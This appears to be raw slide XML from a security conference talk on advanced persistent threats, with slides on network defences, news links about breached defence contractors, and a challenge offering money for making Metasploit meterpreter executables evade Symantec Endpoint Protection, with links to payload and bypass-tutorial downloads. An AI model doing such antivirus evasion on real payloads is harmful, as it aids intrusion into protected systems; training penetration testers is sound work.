              <a:t>Get Paid.... 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8600" y="2514600"/>
            <a:ext cx="8458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 smtClean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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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133600"/>
            <a:ext cx="66294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45170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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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43000" y="1371600"/>
            <a:ext cx="7026275" cy="1895475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Geez...That's A Lot To Bypass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8600" y="2514600"/>
            <a:ext cx="8458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 smtClean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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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28600" y="2286000"/>
            <a:ext cx="86868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576263" indent="-57626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GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>More Security Measures are being implemented on company networks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>today</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="576263" indent="-57626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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewalls are common place </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(both perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and host-based)</a:t>
            </a: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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anti-Virus is smarter (removes popular hacker tools, and in some cases stops buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>overflows)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" dirty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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intrusion Detection/Prevention Systems are hard to detect let alone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bypass</a:t>
            </a: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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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Layer 7 proxies force tunnelling through protocols and may require authentication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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NAC Solutions are making their way into networks</a:t>
            </a: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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network/System Administrators are much more security conscious</a:t>
            </a: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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IT Hardware/Software vendors are integrating security into their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SDLC</a:t>
            </a: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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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400" dirty="0" smtClean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600" dirty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600" b="1" dirty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600" dirty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600" dirty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b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF6600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GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a: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600" b="1" dirty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600" dirty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5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b="1" dirty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600" b="1" dirty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600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1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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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43000" y="914401"/>
            <a:ext cx="7026275" cy="685799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How About A Challenge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8600" y="2514600"/>
            <a:ext cx="8458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 smtClean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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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28600" y="1524000"/>
            <a:ext cx="86868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576263" indent="-57626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GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> EXE files that I need to get past Symantec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EndPoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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GB" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download the AV Bypass tutorials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1033463" lvl="1" indent="-576263">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="4D4D4D"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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US" sz="1400" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>strategicsec.com/avbypass.zip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1033463" lvl="1" indent="-576263">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="4D4D4D"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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400" dirty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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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GB" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> EXE’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1033463" lvl="1" indent="-576263">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="4D4D4D"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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US" sz="1400" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://strategicsec.com/msf_executables-password-is-msf.rar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1033463" lvl="1" indent="-576263">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="4D4D4D"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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400" dirty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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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GB" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get the Windows 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VMWare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> image that is running SEP 12 from me (on USB key)</a:t>
            </a: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400" dirty="0" smtClean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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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GB" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Make my EXEs bypass SEP while remaining functional for $100 per EXE</a:t>
            </a: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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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400" dirty="0" smtClean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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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GB" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ASUS Transformer for best bypass with good documentation</a:t>
            </a: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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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400" dirty="0" smtClean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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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GB" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MacBook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Air for bypassing everything in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VirusTotal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with good documentation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0" smtClean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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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400" dirty="0" smtClean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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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400" dirty="0" smtClean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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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400" dirty="0" smtClean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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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400" dirty="0" smtClean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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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400" dirty="0" smtClean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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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400" dirty="0" smtClean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600" dirty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600" b="1" dirty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600" dirty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600" dirty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b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF6600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GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a: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600" b="1" dirty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600" dirty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5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b="1" dirty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600" b="1" dirty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600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1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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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43000" y="2057400"/>
            <a:ext cx="7026275" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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 dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>News Flash......</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All That Doesn’t Stop APT!!!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0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8600" y="2514600"/>
            <a:ext cx="8458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565150" indent="-565150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rgbClr val="FF6600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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="16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1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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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43000" y="990600"/>
            <a:ext cx="7026275" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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 dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 Quotes That Sum Up APT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0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8600" y="2514600"/>
            <a:ext cx="8458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565150" indent="-565150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rgbClr val="FF6600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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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2286000"/>
            <a:ext cx="86868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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>APT: There are people smarter than you, they have more resources than you, and they are coming for you. Good luck with that”   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>					--Matt Olney (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Sourcefire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>)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When it comes to companies with government/military ties, valuable intellectual property, or lots of money – they generally fall into 1 of 2 categories. Those that have been compromised by APT, and those that don’t know they’ve been compromised by APT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>					-- CIO of a Large Defense Contractor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dirty="0" smtClean="0"/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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/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400" dirty="0" smtClean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600" dirty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600" b="1" dirty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600" dirty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600" dirty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b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF6600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GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a: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600" b="1" dirty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600" dirty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5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b="1" dirty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600" b="1" dirty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600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1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752600"/>
            <a:ext cx="8382000" cy="3657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endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\j0e\Documents\My Dropbox\BigBangTheory\6-SlidesInWork\How-APT-Countermeasures-are-Defeat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8534400" cy="4830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3820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2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" eaLnBrk="1" hangingPunct="1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WHY APT!?!?!?!?!?!?!?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If its easier to steal it than Reverse Engineer it </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>or R&amp;D it someone probably will!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5648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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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43000" y="1600200"/>
            <a:ext cx="7026275" cy="1895475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Joe McCray.... Who the heck are you? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0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8600" y="2514600"/>
            <a:ext cx="8458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565150" indent="-565150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rgbClr val="FF6600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r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A Network/Web Application Penetration Tester &amp; Trainer</a:t>
            </a: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sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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 smtClean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r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A.K.A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a: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r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The black guy at security conferences</a:t>
            </a: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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="16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1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2296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Who Got Owned? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defense Contractors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382000" cy="502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en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Northrop Grumman:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.foxnews.com/scitech/2011/05/31/northrop-grumman-hit-cyber-attack-source-says/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Lockheed Martin:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://packetstormsecurity.org/news/view/19242/March-RSA-Hack-Hits-Lockheed-Remote-Systems-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Breached.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>L3:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://threatpost.com/en_us/blogs/report-l3-warns-employees-attacks-using-compromised-securid-tokens-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>060111</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Booz Allen Hamilton:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://gizmodo.com/5820049/anonymous-leaks-90000-military-email-accounts-in-latest-antisec-attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>SAIC(older):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.usatoday.com/news/nation/2007-07-20-saic-security_N.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400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4724400"/>
            <a:ext cx="2686050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7630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Who Got Owned? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Financials &amp; Other Prominent Organizations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en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Google:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>en.wikipedia.org/wiki/Operation_Aurora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None/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>IMF:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.gsnmagazine.com/node/23578</a:t>
            </a:r>
